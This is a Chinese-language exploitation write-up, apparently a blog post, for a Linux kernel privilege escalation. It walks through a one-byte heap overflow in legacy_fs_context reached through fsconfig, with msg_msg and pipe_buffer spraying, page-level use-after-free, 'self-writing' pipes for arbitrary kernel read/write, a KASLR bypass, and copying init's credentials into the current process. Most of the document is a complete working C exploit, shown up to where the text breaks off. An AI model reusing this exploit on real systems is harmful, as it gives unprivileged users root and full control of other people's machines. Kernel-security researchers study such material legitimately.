要改这个kcalloc中pipe_bufs的大小，在pipe系统调用的过程中是万不可行，但是我们可以利用到fcntl这样一个系统调用，我们可以来稍微查看一下其中的源码

SYSCALL_DEFINE3(fcntl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
{        
        struct fd f = fdget_raw(fd);
        long err = -EBADF;

        if (!f.file)
                goto out;

        if (unlikely(f.file->f_mode & FMODE_PATH)) {
                if (!check_fcntl_cmd(cmd))
                        goto out1;
        }

        err = security_file_fcntl(f.file, cmd, arg);
        if (!err)
                err = do_fcntl(fd, cmd, arg, f.file);

out1:
         fdput(f);
out:
        return err;
}

static long do_fcntl(int fd, unsigned int cmd, unsigned long arg,
                struct file *filp)
{
        void __user *argp = (void __user *)arg;
        struct flock flock;
        long err = -EINVAL;
    switch (cmd) {
        ...
                case F_SETPIPE_SZ:
                case F_GETPIPE_SZ:
                err = pipe_fcntl(filp, cmd, arg);
                break;

        ...

                default:
                break;
        }
        return err;
}

通过cmd指令F_SETPIPE_SZ,我们可以调用pipe_fcntl这样一个函数

long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
{
        struct pipe_inode_info *pipe;
        long ret;

        ...

        switch (cmd) {
        case F_SETPIPE_SZ:
                ret = pipe_set_size(pipe, arg);
                break;
                ...
        }

        __pipe_unlock(pipe);
        return ret;
}

调用pipe_set_size，这个函数对我们的诱惑极大，光函数名即可猜测其中我们可以设置pipe_buffer的大小

/*
 * 分配一个pipe_buffer的新数组（也就是调用了kcalloc) 并且把以往的数据复制到上面. 
 * 如果成功则返回大小, 错误则返回-ERROR .
 */
static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
        unsigned long user_bufs;
        unsigned int nr_slots, size;
        long ret = 0;

        size = round_pipe_size(arg);
        nr_slots = size >> PAGE_SHIFT;

        ...

        ret = pipe_resize_ring(pipe, nr_slots);
        ...

        return ret;
}

这里调用pipe_resize_ring来重新分配pipe_buffer

/*
 * Resize the pipe ring to a number of slots.
 */
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
        ...

        bufs = kcalloc(nr_slots, sizeof(*bufs),
                       GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
        ...
        kfree(pipe->bufs);
        pipe->bufs = bufs;
        pipe->ring_size = nr_slots;
        if (pipe->max_usage > nr_slots)
                pipe->max_usage = nr_slots;
        pipe->tail = tail;
        pipe->head = head;

        /* This might have made more room for writers */
        wake_up_interruptible(&pipe->wr_wait);
        return 0;
}

可以看到，我们此时传入的nr_slots若为64，也就是之前的4倍，那么总共分配得大小为2k<0xA00<4k我们便可以将我们的pipe_buffer从kmalloc-cg-4k当中分配，就可以和我们之前的legacy_data进行互动

2.任意地址读/写

接下来我们将从单字节的溢出，直到实现任意地址读写

step I：构造1级UAF

我们首先大量堆喷pipe,这是为了之后我们重复分配提供条件，

然后我们同之前基地址泄露类似，堆喷msg_msg,然后我们就可以利用溢出来将msg_msg的m_ts字段覆盖为一个大值来进行越界读，会成为下面这种情况

这样我们就可以再次通过任意写再来覆盖相邻的msg_msg的下一个msg_msg，且刚好溢出一个空子节

（为什么不直接溢出legacy_fs_context的相邻msg_msg呢，这是因为我们由于需要创造一个漏洞的整数溢出，所以在我们溢出的第一个相邻msg_msg的时候必定会写入一个=和\x00，因此我们选则溢出到下一个4k页面）

而本次我们利用到的结构体为pipe_buffer，根据上面我们的初期知识准备知道，我们可以通过fcntl来修改pipe_buffer的大小，我们将其改为一次分配64个buffer，也就是64*0x28大小，该堆块刚好也是从order-3来分配，因此我们可以通过释放掉msg_msg接着利用fcntl重分配pipe_buffer来构造溢出条件

这样我们继续写入legacy_data，直到恰好使得我们（broken）msg_msg下一个相邻pipe_buffer的page指针低1字节为\x00

这样我们大概率就可以构造出两个pipe_buffer同时指向同一个page,情况如下：

step II：构造二级UAF

此时我们如果释放掉其中一个pipe,那么我们就会释放掉该page对应的物理页面，因此就构成了一个UAF，此时我们若再次分配pipe_buffer，我们就会从刚释放掉的4k obj当中分配，就构成如下情况

此时我们可以再次构造一个UAF，这里构造的目的主要是为了任意修改之后的页面，然后我们再次重复上次的操作，再次重分配pipe_buffer如下：

step III：构造自写管道

这里我们已知将目前二级UAF所指向的页面分配了多个pipe_buffer，此时我们将其中的一个pipe_buffer指向上一级，也就是自身物理页面所对应的struct page，如下：

此时我们的最后一级pipe_buffer就可以往自身存在的页面进行写入了

step IV：构造任意读写系统

我们目前可以写入自身的页面，看起来好像跟任意读写没什么关联，但接下来构造的读写系统才算是精妙所在

首先我们同时构建三个上述的自写管道

当同时在一个page内存在三个自写管道时，我们就可以通过不断修改他们之间的offset/len字段来达成重复的利用读/写，其中各个管道的功能如下

管道1用来在任意内存中进行读/写
管道2用来修正复原我们的管道3
管道3用来修改我们的管道1和恢复我们的管道2

通过上面三个自写管道我们就可以达成任意地址读写，这个系统可能在讲述时不好理解，这里需要对于其中的代码以及pipe_buffer的布局了解透彻才想的清楚，但是想清楚之后是十分顺畅的~

3.地址泄漏和权限提升

我们知道page对于物理地址页面的映射是线性的，而struct page数据结构体数组存放在vmemmap区域

因此若我们知道了vmemmap_base基地址，则可以读写数组当中所有的物理页面

========================================================================================================================
    Start addr    |   Offset   |     End addr     |  Size   | VM area description
========================================================================================================================
                  |            |                  |         |
 0000000000000000 |    0       | 00007fffffffffff |  128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
                  |            |                  |         |
 0000800000000000 | +128    TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
                  |            |                  |         |     virtual memory addresses up to the -128 TB
                  |            |                  |         |     starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
                                                            |
                                                            | Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
                  |            |                  |         |
 ffff800000000000 | -128    TB | ffff87ffffffffff |    8 TB | ... guard hole, also reserved for hypervisor
 ffff880000000000 | -120    TB | ffff887fffffffff |  0.5 TB | LDT remap for PTI
 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)
 ffffc88000000000 |  -55.5  TB | ffffc8ffffffffff |  0.5 TB | ... unused hole
 ffffc90000000000 |  -55    TB | ffffe8ffffffffff |   32 TB | vmalloc/ioremap space (vmalloc_base)
 ffffe90000000000 |  -23    TB | ffffe9ffffffffff |    1 TB | ... unused hole
 ffffea0000000000 |  -22    TB | ffffeaffffffffff |    1 TB | virtual memory map (vmemmap_base)
 ffffeb0000000000 |  -21    TB | ffffebffffffffff |    1 TB | ... unused hole
 ffffec0000000000 |  -20    TB | fffffbffffffffff |   16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
                                                            |
                                                            | Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
                  |            |                  |         |
 fffffc0000000000 |   -4    TB | fffffdffffffffff |    2 TB | ... unused hole
                  |            |                  |         | vaddr_end for KASLR
 fffffe0000000000 |   -2    TB | fffffe7fffffffff |  0.5 TB | cpu_entry_area mapping
 fffffe8000000000 |   -1.5  TB | fffffeffffffffff |  0.5 TB | ... unused hole
 ffffff0000000000 |   -1    TB | ffffff7fffffffff |  0.5 TB | %esp fixup stacks
 ffffff8000000000 | -512    GB | ffffffeeffffffff |  444 GB | ... unused hole
 ffffffef00000000 |  -68    GB | fffffffeffffffff |   64 GB | EFI region mapping space
 ffffffff00000000 |   -4    GB | ffffffff7fffffff |    2 GB | ... unused hole
 ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0
 ffffffff80000000 |-2048    MB |                  |         |
 ffffffffa0000000 |-1536    MB | fffffffffeffffff | 1520 MB | module mapping space
 ffffffffff000000 |  -16    MB |                  |         |
    FIXADDR_START | ~-11    MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
 ffffffffff600000 |  -10    MB | ffffffffff600fff |    4 kB | legacy vsyscall ABI
 ffffffffffe00000 |   -2    MB | ffffffffffffffff |    2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________

而KASLR的粒度是256MB，所以根据上面构造自写管道的过程我们得到了一个page结构体的地址，通过它可以得出一个可能正确的vmemmap_base，也就是将低28位取0即可

这里说可能的原因也是因为当我们的内存大于16GB的时候，那么我们pages数组的大小便会大于(0x400000000/0x1000)*0x40= 0x10000000,此时就刚好超过KASLR的粒度，所以我们直接取0是一个可能的值，因此还需要判断一下获取到的vmemmap_base的正确性

至于正确性的判断，在实模式当中我们需要用到一个写入的汇编函数secondary_startup_64，该函数被应用到linux内核的启动过程中，且在物理内存偏移0x9d000的地方会存放该函数的一个指针，（这里固定的原因我猜可能是在由于实模式下直接使用物理地址，所以就直接将其存放在固定的位置拿来使用）

我们同样可以将内核用objdump进行查看也可以看到该函数，就刚好处于开头这一部分

可以看到他的一个地址是在内核text代码段偏移0x30的地址，因此我们使用这个点来进行检测

通过上述方法，我们即可得到内核基地址，此时我们还需要知道我们的page_offset_base,也就是我们physmap所对应的虚拟地址，此时用到task_struct中的一个字段ptraced,该字段在我们的进程没有被附加的时候会指向其自身，且该地址位于我们的physmap当中

当我们知道了physmap线性映射区的基地址，那么我们就可以知道某个虚拟地址所对应的page结构体，因此就达成了真正意义上的任意地址读写，此时我们可以利用它来找到我们本进程的task_struct（寻找的方式就是利用prctl函数的PR_SET_NAME来修改进程taskt_struct的comm字段，使用它来做一个标记，然后在页面寻找），然后通过其中的parent字段向上寻找，也就是不断找寻父进程，直到找到最终的init进程，但是我个人在调试过程中发现最终找到的是swapper进程，其pid为0，init进程pid为1，但是这并不影响最终我们的提权

最终我们只需要将init/swapper进程的cred字段的地址赋值给当前进程的cred字段即可达成提权，效果如下：

最终的exploit如下：

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>

#define MSG_NOERROR     010000  /* no error if message is too big */
#define MSG_COPY        040000  /* copy (not remove) all queue messages */

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif

#ifndef __NR_msgget
#define __NR_msgget 186
#endif

#ifndef __NR_msgget
#define __NR_msgsnd 189
#endif

#ifndef __NR_msgget
#define __NR_msgrcv 188
#endif

/* to run the exp on the specific core only */
void bind_cpu(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

int fs_fd;                 /* using by filesystem */

#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)

void info_log(char* str){
         printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
  printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
  exit(1);
}

long get_msg(void){
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long send_msg(int msqid, void* msgp, size_t msgsz, long msgflg){
    ((struct msgbuf *)msgp)->mtype = msgflg;
    return msgsnd(msqid, msgp, msgsz, 0);
}

long recv_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

long copy_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
    return msgrcv(msqid, msgp, msgsz, msgtyp, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
}

int fsopen(const char *fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fsfd, unsigned int cmd, 
             const char *key, const void *val, int aux)
{
    return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

void prepare_for_overwrite(){
    puts("Opening the ext4 filesystem");
    fs_fd = fsopen("ext4", 0);
    if (fs_fd < 0) {
        puts("Opening");
        exit(-1);
    }
    for (int i = 0; i < 186; i++) {
        fsconfig(fs_fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
    }
    fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "P", 0);

}

#define PIPE_SPRAY_NR 0x100
#define MSG_SPRAY_NR 0x100
#define MSG_SZ (0x1000 - 0x30 + 0x20 - 0x8)
#define OOB_READ_SZ (0x2000 - 0x30 - 0x8)
#define MSG_TYPE 0x41414141
int pipe_fd[PIPE_SPRAY_NR][2];
int msqid[MSG_SPRAY_NR];
int victim_qidx = -1;

void occupy_4k_obj_by_msg(){
    size_t buf[0x1000];
    char pat[0x100];
    info_log("Step I:Construct the first page uaf...");

    puts("Allocating the pipe...");
    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(pipe(pipe_fd[i]) < 0){
            error_log("Allocating the pipe failed!");
        }
    }

    puts("Allocating the msg_queue and msg_msg...");
    for(int i = 0; i < MSG_SPRAY_NR - 8; i++){
        if((msqid[i] = get_msg()) < 0){
            error_log("Allocating the msg_queue failed!");
        }
        buf[0] = i;
        buf[MSG_SZ/8] = i;
        if(send_msg(msqid[i], buf, MSG_SZ, MSG_TYPE)){
            error_log("Write the msg failed!");
        }
    }

    prepare_for_overwrite();
    memset(pat, '\x42', sizeof(pat));
    pat[21] = '\x00';
    fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", pat, 0);

    for(int i = MSG_SPRAY_NR - 8; i < MSG_SPRAY_NR; i++){
        if((msqid[i] = get_msg()) < 0){
            error_log("Allocating the msg_queue failed!");
        }
        buf[0] = i;
        buf[MSG_SZ/8] = i;
        int ret = send_msg(msqid[i], buf, MSG_SZ, MSG_TYPE); 
        if(send_msg(msqid[i], buf, MSG_SZ, MSG_TYPE)){
            error_log("Write the msg failed!");
        }
    }
    puts("Trying to overwrite the msg_msg->m_ts...");
    fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);
    puts("Trying to make an oob read...");
    for(int i = 0; i < MSG_SPRAY_NR; i++){
        int read_sz = copy_msg(msqid[i], buf, OOB_READ_SZ, 0);
        if(read_sz < 0){
            error_log("read msg failed!");
        }else if(read_sz > MSG_SZ){
            victim_qidx = i;
            break;
        }
    }
    if(victim_qidx == -1){
        error_log("failed to find the victim_qidx!");
    }
    printf("\033[0m\033[1;34mWe found the victim_msq_queue_idx\033[0m:%d\n", victim_qidx);
}

int victim_pid = -1, orig_pid;

void construct_first_uaf(){
    size_t buf[0x1000];
    info_log("Step II:Construct the first page level uaf");
    puts("We need to free the msg_msg except the corrupted one!");
    for(int i = 0; i < MSG_SPRAY_NR; i++){
        if(i == victim_qidx){
            continue;
        }
        if(recv_msg(msqid[i], buf, MSG_SZ, 0) < 0){
            error_log("unlink the msg_msg failed!");
        }
        if(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000*64) < 0){     /* pipe_buffers is 64*0x28 */
            error_log("realloc pipe failed...");
        }
        write(pipe_fd[i][1], "peiadhao", 8);
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], &i, sizeof(int));
        write(pipe_fd[i][1], "peiadhao", 8);
        write(pipe_fd[i][1], "peiadhao", 8);
    }
    puts("Overflow the pipe_buffers by one null byte...");
    for(int i = 0; i < 185; i++){
        fsconfig(fs_fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
    }

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        char tmp[0x10];
        int nr;

        if(i == victim_qidx){
            continue;
        }

        if(read(pipe_fd[i][0], tmp, 8) < 0){
            error_log("read pipe failed!");
        }
        if(read(pipe_fd[i][0], &nr, sizeof(int)) < 0){
            error_log("read pipe failed!");
        }
        if(!strcmp(tmp, "peiadhao")&& nr != i){
            orig_pid = i;
            victim_pid = nr;
            break;
        }
    }
    if(victim_pid == -1){
        error_log("failed to find the uaf one!");
    }

    printf("\033[0m\033[1;34mWe found the victim_pid:%d, original_pid:%d\033[0m\n", victim_pid, orig_pid);

}

struct pipe_buffer {
        struct page *page;
        unsigned int offset, len;
        const struct pipe_buf_operations *ops;
        unsigned int flags;
        unsigned long private;
};

#define SECOND_PIPE_BUF_SZ 96
struct pipe_buffer info_pipe_buffer;
int victim_second_pid = -1, orig_second_pid;

void construct_second_uaf(){
    int second_pipe_sz = 0x1000 * (SECOND_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
    size_t buf[0x1000] = {0};
    memset(buf, '\x00', sizeof(buf));
    size_t pipe_buf[0x100];
    info_log("Step III:Constrcut the second page level uaf...");
    write(pipe_fd[victim_pid][1], buf, SECOND_PIPE_BUF_SZ*2 - 3*8 - 3*sizeof(int));

    puts("Free the original pipe...");
    close(pipe_fd[orig_pid][0]);
    close(pipe_fd[orig_pid][1]);

    puts("Spraying the smaller pipe_buffer...");
    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx || i == victim_pid || i == orig_pid){
            continue;
        }
        if(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, second_pipe_sz) < 0){
            error_log("realloc the pipe_buffer failed!");
        }
    }
    memset(pipe_buf, '\x00', sizeof(pipe_buf));
    read(pipe_fd[victim_pid][0], buf, SECOND_PIPE_BUF_SZ - 8 - 4);
    read(pipe_fd[victim_pid][0], pipe_buf, 0x28);

    for(int i = 0; i < 0x28/8; i++){
        printf("[--- data dump ---][%d] %lx\n", i, pipe_buf[i]);
    }
    memcpy(&info_pipe_buffer, pipe_buf, 0x28);

    printf("\033[0m\033[1;34minfo_pipe_buffer->page    :%p\033[0m\n", info_pipe_buffer.page);
    printf("\033[0m\033[1;34minfo_pipe_buffer->offset  :%d\033[0m\n", info_pipe_buffer.offset);
    printf("\033[0m\033[1;34minfo_pipe_buffer->len     :%d\033[0m\n", info_pipe_buffer.len);
    printf("\033[0m\033[1;34minfo_pipe_buffer->ops     :%p\033[0m\n", info_pipe_buffer.ops);
    printf("\033[0m\033[1;34minfo_pipe_buffer->flags   :%d\033[0m\n", info_pipe_buffer.flags);
    printf("\033[0m\033[1;34minfo_pipe_buffer->private :%ld\033[0m\n", info_pipe_buffer.private);

    for(int i = 0; i < 35; i++){
        write(pipe_fd[victim_pid][1], &info_pipe_buffer, 0x28);
        write(pipe_fd[victim_pid][1], buf, SECOND_PIPE_BUF_SZ - 0x28);
    }
    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        int nr;
        char tmp[0x10];
        if(i == victim_qidx || i == victim_pid || i == orig_pid){
            continue;
        }
        read(pipe_fd[i][0], &nr, sizeof(int));
        if(nr < PIPE_SPRAY_NR && nr != i){
            orig_second_pid = i;
            victim_second_pid = nr;
        }
    }
    if(victim_second_pid == -1){
        error_log("Can not find the second victim pid");
    }
    printf("\033[0m\033[1;34mWe found the 2nd victim_pid:%d, 2nd original_pid:%d\033[0m\n", victim_second_pid, orig_second_pid);

}

struct pipe_buffer evil_pipe_buffer;
#define THIRD_PIPE_BUF_SZ 192
int self_2nd_pid = -1, self_3rd_pid = -1, self_4th_pid = -1;

void build_self_writing_pipe(){
    info_log("Step IV:Building the self menufication pipe...");
    size_t buf[0x1000];
    struct page * tmp_page;
    int third_pipe_sz = 0x1000*(THIRD_PIPE_BUF_SZ/sizeof(struct pipe_buffer));

    memset(buf, '\x00', sizeof(buf));

    write(pipe_fd[victim_second_pid][1], buf, THIRD_PIPE_BUF_SZ - 3*8 - 3*sizeof(int));
    puts("Free the original second pipe...");
    close(pipe_fd[orig_second_pid][0]);
    close(pipe_fd[orig_second_pid][1]);

    puts("Spraying the smaller pipe_buffer...");

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx || i == victim_pid || i == orig_pid
           || i == victim_second_pid || i == orig_second_pid){
            continue;
        }
        if(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, third_pipe_sz) < 0){
            error_log("Realloc the 192 pipe_buffers failed!");
        }
    }

    memcpy(&evil_pipe_buffer, &info_pipe_buffer, 0x28);
    evil_pipe_buffer.offset = THIRD_PIPE_BUF_SZ;
    evil_pipe_buffer.len = THIRD_PIPE_BUF_SZ;

    puts("Construct the 2nd self read/write pipe...");
    write(pipe_fd[victim_second_pid][1], &evil_pipe_buffer, 0x28);
    write(pipe_fd[victim_second_pid][1], buf, THIRD_PIPE_BUF_SZ - 0x28);

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx || i == victim_pid || i == orig_pid
           || i == victim_second_pid || i == orig_second_pid){
            continue;
        }
        read(pipe_fd[i][0], &tmp_page, sizeof(size_t));
        if(tmp_page == evil_pipe_buffer.page){
            self_2nd_pid = i;
            break;
        }
    }
    if(self_2nd_pid == -1){
        error_log("Find the 2nd self pipe failed!");
    }

    puts("Construct the 3rd self read/write pipe...");
    write(pipe_fd[victim_second_pid][1], &evil_pipe_buffer, 0x28);
    write(pipe_fd[victim_second_pid][1], buf, THIRD_PIPE_BUF_SZ - 0x28);

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx 
           || i == victim_pid || i == orig_pid
           || i == victim_second_pid || i == orig_second_pid
           || i == self_2nd_pid){
            continue;
        }
        read(pipe_fd[i][0], &tmp_page, sizeof(size_t));
        if(tmp_page == evil_pipe_buffer.page){
            self_3rd_pid = i;
            break;
        }
    }
    if(self_3rd_pid == -1){
        error_log("Find the 3rd self pipe failed!");
    }

    puts("Construct the 4th self read/write pipe...");
    write(pipe_fd[victim_second_pid][1], &evil_pipe_buffer, 0x28);
    write(pipe_fd[victim_second_pid][1], buf, THIRD_PIPE_BUF_SZ - 0x28);

    for(int i = 0; i < PIPE_SPRAY_NR; i++){
        if(i == victim_qidx 
           || i == victim_pid || i == orig_pid
           || i == victim_second_pid || i == orig_second_pid
           || i == self_2nd_pid
           || i == self_3rd_pid){
            continue;
        }
        read(pipe_fd[i][0], &tmp_page, sizeof(size_t));
        if(tmp_page == evil_pipe_buffer.page){
            self_4th_pid = i;
            break;
        }
    }
    if(self_4th_pid == -1){
        error_log("Find the 4th self pipe failed!");
    }
}

struct pipe_buffer evil_2nd_pipe;       /* pipe_buffer page offset 192 */
struct pipe_buffer evil_3rd_pipe;       /* pipe_buffer page offset 192*2 */
struct pipe_buffer evil_4th_pipe;       /* pipe_buffer page offset 192*3 */

void setup_evil_pipe(){

    puts("initial the three pipe_buffer...");
    memcpy(&evil_2nd_pipe, &info_pipe_buffer, 0x28);
    memcpy(&evil_3rd_pipe, &info_pipe_buffer, 0x28);
    memcpy(&evil_4th_pipe, &info_pipe_buffer, 0x28);

    evil_2nd_pipe.offset = 0;
    evil_2nd_pipe.len = 0xff0;

    puts("Hijack the pipe_3nd_buf point to the 4th location...");
    evil_3rd_pipe.offset = 3*THIRD_PIPE_BUF_SZ;
    evil_3rd_pipe.len = 0;

    /* make 3rd pipe_buffer point to the 4th_pipe_buffer */
    write(pipe_fd[self_4th_pid][1], &evil_3rd_pipe, sizeof(evil_4th_pipe));     

    evil_4th_pipe.offset = THIRD_PIPE_BUF_SZ;
    evil_4th_pipe.len = 0;
}

char tmp_zero_buf[0x1000] = {'\x00'};
void arbitrary_read_by_pipe(struct page* page_to_read, void* dst){
    /* construct the self_2nd_pipe for reading the page_to_read */
    evil_2nd_pipe.offset = 0;
    evil_2nd_pipe.len = 0xfff;
    evil_2nd_pipe.page = page_to_read;

    /* let the 4th pipe_buffer point to the 2nd buffer */
    write(pipe_fd[self_3rd_pid][1], &evil_4th_pipe, sizeof(evil_3rd_pipe));     

    /* hijack the 2nd pipe for arbitrary read */
    write(pipe_fd[self_4th_pid][1], &evil_2nd_pipe, sizeof(evil_4th_pipe));
    write(pipe_fd[self_4th_pid][1], tmp_zero_buf, THIRD_PIPE_BUF_SZ - sizeof(evil_4th_pipe));   /* 4th point to the 3rd */

    /* recover the initial context */
    write(pipe_fd[self_4th_pid][1], &evil_3rd_pipe, sizeof(evil_4th_pipe)); 

    read(pipe_fd[self_2nd_pid][0], dst, 0xff8);
}

void arbitrary_write_by_pipe(struct page* page_to_write, void* rsc, size_t len){
    /* construct the self_2nd_pipe for writing the page_to_write */
    evil_2nd_pipe.offset = 0;
    evil_2nd_pipe.len = 0;
    evil_2nd_pipe.page = page_to_write;
    /* let the 4th pipe_buffer point tot the 2nd buffer */
    write(pipe_fd[self_3rd_pid][1], &evil_4th_pipe, sizeof(evil_4th_pipe));

    /* hijack the 2nd pipe for aarbitrary write */
    write(pipe_fd[self_4th_pid][1], &evil_2nd_pipe, sizeof(evil_2nd_pipe));
    write(pipe_fd[self_4th_pid][1], tmp_zero_buf, THIRD_PIPE_BUF_SZ - sizeof(evil_2nd_pipe));

    /* recover the initiaal context */
    write(pipe_fd[self_4th_pid][1], &evil_3rd_pipe, sizeof(evil_3rd_pipe));

    write(pipe_fd[self_2nd_pid][1], rsc, len);

}

size_t parent_task, current_task;
size_t vmemmap_base, kernel_base, kernel_offset, page_offset_base;

void info_leaking_by_arbitrary_pipe(){
    info_log("Step V:Leaking the kernel base addr by arbitrary read...");
    size_t page_buf[0x2000];
    setup_evil_pipe();
    size_t *comm_addr;
    size_t ptraced;
    int try_hits = 0;

    vmemmap_base = (size_t)(info_pipe_buffer.page)&0xfffffffff0000000;
    for(;;){
        puts("Checking for the vmemmap_base's reality...");
        printf("\033[0m\033[1;34mpossible vmemmap_base:%p\033[0m\n", (void*)vmemmap_base);
        /*
         * We need to know physmap + 0x9d000 fun ptr
         * so we should check vmemmap_base + (0x9d000/0x1000)*0x40
         * */
        arbitrary_read_by_pipe((struct page*)(vmemmap_base + 157*0x40), page_buf);
        if(page_buf[0] == 0x2400000000){
            error_log("reading failed!");
        }
        if(page_buf[0] > 0xffffffff81000000 && (page_buf[0]&0xfff) == 0x030){
            kernel_base = page_buf[0] - 0x30;
            kernel_offset = kernel_base -  0xffffffff81000000;
            printf("\033[0m\033[1;34mkernel_base    :%p\033[0m\n", (void*)kernel_base);
            printf("\033[0m\033[1;34mkernel_offset  :%p\033[0m\n", (void*)kernel_offset);
            break;
        }
        try_hits++;
        if(try_hits == 5){
            vmemmap_base -= 0x10000000;
            try_hits = 0;
        }
    }

    printf("\033[0m\033[1;34mvmemmap_base   :%p\033[0m\n", (void*)vmemmap_base);
    puts("Leak the page_offset_base...");

    for(int i = 1; 1 ;i++){
        arbitrary_read_by_pipe((struct page*)(vmemmap_base + (i-1)*0x40), page_buf);
        arbitrary_read_by_pipe((struct page*)(vmemmap_base + i*0x40), &((char*)page_buf)[0x1000]);
        /* find the struct task_struct.comm */
        comm_addr = (size_t*)memmem(page_buf, 0x1ff0,"PEIWITHHAO", 10);
        if(comm_addr == NULL){
            continue;
        }
        if((((size_t)comm_addr - (size_t)page_buf)&0xfff) < 500){
            continue;
        }
        //printf("comm_addr[-2]:%lx\n", comm_addr[-2]);
        //printf("comm_aadr[-3]:%lx\n", comm_addr[-3]);   
        //printf("comm_aadr[-52]:%lx\n", comm_addr[-3]);
        //printf("comm_aadr[-53]:%lx\n", comm_addr[-3]);    
        if(comm_addr[-2] > 0xffff888000000000       /* task.cred        */
           &comm_addr[-3] > 0xffff888000000000      /* task.real_cred   */ 
           &comm_addr[-52] > 0xffff888000000000     /* task.parent      */
           &comm_addr[-53] > 0xffff888000000000){   /* task.real_parent */
            parent_task = comm_addr[-53];
            ptraced = comm_addr[-46];               /* task.ptraced     */
            current_task = (comm_addr[-46] - 2280);        /* current_task */
            page_offset_base = (size_t)current_task - i*0x1000;
            page_offset_base &= 0xfffffffff0000000;
            PRINT_ADDR("current_task", current_task);
            PRINT_ADDR("parent_task", parent_task);
            PRINT_ADDR("page_offset_base", page_offset_base);

            break;
        }
    }
}

size_t direct_mapping_addr2page(size_t addr){
    size_t page_nr = ((addr&(~0xfff)) - page_offset_base)/0x1000;
    return (vmemmap_base + page_nr*0x40);
}

size_t page_buf[0x8000];
size_t init_task, init_cred, init_nsproxy;
void priviledge_escalation(){
    size_t *task_buf;
    size_t parent_page;
    info_log("Step VI:Hijack the current_task to get the root...");
    for(;;){
        parent_page = direct_mapping_addr2page(parent_task);
        task_buf = (size_t*)((size_t)page_buf + (parent_task & 0xfff));
        arbitrary_read_by_pipe((struct page*)parent_page, page_buf);
        arbitrary_read_by_pipe((struct page*)(parent_page + 0x40), &page_buf[0x1000/8]);

        /* task_struct.real_parent offset is 2224 */
        if(parent_task == task_buf[2224/8]){
            break;
        }
        parent_task = task_buf[2224/8];
    }
    init_task = parent_task;
    /* task_struct.cred offset is 2632 */
    init_cred = task_buf[2632/8];
    init_nsproxy = task_buf[341];
    PRINT_ADDR("init_task", (size_t)init_task);
    PRINT_ADDR("init_cred", (size_t)init_cred);
    PRINT_ADDR("init_nsproxy", (size_t)init_nsproxy);

    puts("Escalating root priviledge now!");
    size_t current_page;
    current_page = direct_mapping_addr2page(current_task);

    memset(page_buf, '\x00', sizeof(page_buf));
    arbitrary_read_by_pipe((struct page*)current_page, page_buf);
    arbitrary_read_by_pipe((struct page*)(current_page + 0x40), &page_buf[0x1000/8]);

    task_buf = (size_t*)((size_t)page_buf + (current_task & 0xfff));
    task_buf[2632/8] = init_cred;
    task_buf[2624/8] = init_cred;
    task_buf[341] = init_nsproxy;
    arbitrary_write_by_pipe((struct page*)current_page, page_buf, 0xff0);
    arbitrary_write_by_pipe((struct page*)(current_page + 0x40), &page_buf[0x1000/8], 0xff0);
    puts("[+]Done!");
}

void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

